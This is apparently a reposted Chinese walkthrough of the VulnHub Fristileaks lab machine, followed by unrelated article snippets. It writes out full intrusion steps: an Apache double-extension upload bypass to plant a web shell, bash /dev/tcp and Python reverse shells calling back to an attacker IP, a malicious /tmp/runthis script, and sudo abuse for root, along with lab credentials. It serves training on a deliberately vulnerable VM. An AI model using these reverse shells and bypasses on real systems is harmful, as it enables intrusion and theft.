vulnhub靶机:Fristileaks 详细过程

news/2024/9/18 20:51:08 标签: web安全, 网络安全, 经验分享, 笔记, 安全

下载

下载地址:https://www.vulnhub.com/entry/fristileaks-13,133/

修改网卡

网卡设置为nat模式,并修改mac地址为

08:00:27:A5:A6:76

信息收集

主机发现

arp-scan -l

发现靶机 IP 是 192.168.109.178

端口扫描

nmap -p- -A 192.168.109.178

目录扫描

python3 dirsearch.py -u "192.168.109.178" -x 403

访问 web

访问靶机 192.168.109.178

访问 /robots.txt

发现有三个路径,分别拼接访问一下

访问之后发现 3 个路径都是这张图

通过首页这里,发现有个小提示,拼接访问一下

发现了登录框

SQL注入和密码爆破都没发现,右击检查页面源代码,发现图片是 base64 加密的

对其进行解码

发现了有 png 字样,将其输出为 png 试试看

可能是密码,回到页面源码,盲猜一波这里的 eezeepz 是用户名,登录试试看

登录发现成功了

eezeepz
keKkeKKeKKeKkEKKEK

get shell

上传一句话木马,失败

它的中间件是apache

利用apache的解析漏洞,去绕过。在Apache1.x/2.x版本中,Apache默认一个文件可以有多个以点分割的后缀,解析文件的规则是从右到左开始判断解析,如果后缀名为不可识别文件解析,就再往左判断。直到识别到合法后缀才进行解析。如 1.php.png

去上传路径

fristi/uploads/1.php.jpg

发现上传成功了,去蚁剑连接

反弹shell,先用kali监听4444端口

nc -lvvp 4444

蚁剑打开虚拟终端 输入

bash -c 'bash -i >& /dev/tcp/192.168.109.139/4444 0>&1'

反弹成功

权限提升

sudo -l 发现没有权限

在家目录下发现有三个用户

在 eezeepz 家目录下找到 notes.txt

发现可以在 /tmp 目录下放一个文件名为runthis的脚本文件,反弹shell
shell.py 文件内容:

import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("192.168.109.139",8888));
os.dup2(s.fileno(),0); 
os.dup2(s.fileno(),1); 
os.dup2(s.fileno(),2);
p=subprocess.call(["/bin/sh","-i"]);

开启 http 服务

python3 -m http.server 8001

远程下载(在 /tmp 目录下载才会成功)

wget http://192.168.109.139:8001/shell.py

开启监听端口

nc -lvvp 8888

运行下面命令

echo "/usr/bin/python /tmp/shell.py" > /tmp/runthis

稍等片刻,反弹成功

获得交互式shell

python -c 'import pty; pty.spawn("/bin/bash")'

在家目录翻到了两个txt和两个py文件

查看之后发现是两个 txt 是编码后的结果,1 个是编码脚本

修改他的编码脚本改为解码脚本

import base64,codecs,sys
 
def decodeString(str):
  rot13string = codecs.decode(str[::-1], 'rot13')
  return base64.b64decode(rot13string)
 
print(decodeString(sys.argv[1]))

然后对其进行解码

第二个疑似密码,尝试登录

su fristigod
LetThereBeFristi!

登录成功

sudo -l查看具有sudo权限的程序

以fristigod的权限运行一下

 sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom

说是后面要加命令

跟个id试试

 sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom id

发现是root权限

跟/bin/bash获取root的shell

 sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom /bin/bash

提权成功


http://www.niftyadmin.cn/n/5664502.html

相关文章

传输层协议——udp/tcp

目录 再谈端口号 udp 协议 理解报头 udp特点 缓冲区 udp使用的注意事项 tcp协议 TCP的可靠性与提高效率的策略 序号/确认序号 窗口大小 ACK: PSH URG RST 保活机制 重传 三次握手(SYN) 四次挥手(FIN) 流量控制 滑动窗口 拥塞控制 延迟应答 捎带应答 面…

【java】scala ExecutorService停止线程池的简单案例

上代码: import org.scalatest.funsuite.AnyFunSuite import java.util.concurrent.{ExecutorService, Executors, TimeUnit}class ExecutorPoolTest extends AnyFunSuite {val threadPool: ExecutorService Executors.newFixedThreadPool(1)val job: Runnable n…

论文笔记:交替单模态适应的多模态表征学习

整理了CVPR2024 Multimodal Representation Learning by Alternating Unimodal Adaptation)论文的阅读笔记 背景MLA框架实验Q1 与之前的方法相比,MLA能否克服模态懒惰并提高多模态学习性能?Q2 MLA在面临模式缺失的挑战时表现如何?Q3 所有模块是否可以有…

C++中类的创建和声明

目录 前言 一、类的概念 二、对象 前言 说实话,C和C语言有比较大的差别,在C语言中我们面向的是过程,即要怎么实现功能的过程,在C中,我们面向对象,将这些功能和函数封装起来,用到直接调用对象&…

Vert.x, 简介

Vert.x是什么 Vert.x是Eclipse基金会下的一个开源项目,基于Eclipse Public License(EPL)2.0和Apache License 2.0双重许可,是一个基于JVM的用于构建响应式(reactive)应用程序的工具包。 Vert.x基于Netty,但不仅仅局限于开发可扩展的高性能网…

openCV的python频率域滤波

在OpenCV中实现频率域滤波通常涉及到傅里叶变换(Fourier Transform)和其逆变换(Inverse Fourier Transform)。傅里叶变换是一种将图像从空间域转换到频率域的数学工具,这使得我们可以更容易地在图像的频域内进行操作,如高通滤波、低通滤波等。 下面,我将提供一个使用Py…

RTX 4090 系列即将停产,RTX 5090 系列蓄势待发

据最新消息,英伟达将于今年10月正式终结其GeForce RTX 4090及RTX 4090D两款旗舰级显卡的生产线。根据行业媒体报道,英伟达及其合作厂商将从下个月开始全面停止这两款显卡的制造。 自2022年10月问世以来,GeForce RTX 4090凭借其无与伦比的GPU…

国产分布式数据库-tidb单机部署文档

tidb单机部署文档 1、创建用户 #创建用户 useradd tidb #设置密码 passwd tidb2、配置免密码登录 编辑/etc/sudoers文件,文末加入: tidb ALL(ALL) NOPASSWD:ALL如果想要控制某个用户(或某个组用户)只能执行root权限中的一部分命令, 或者允许某些用户使用sudo时…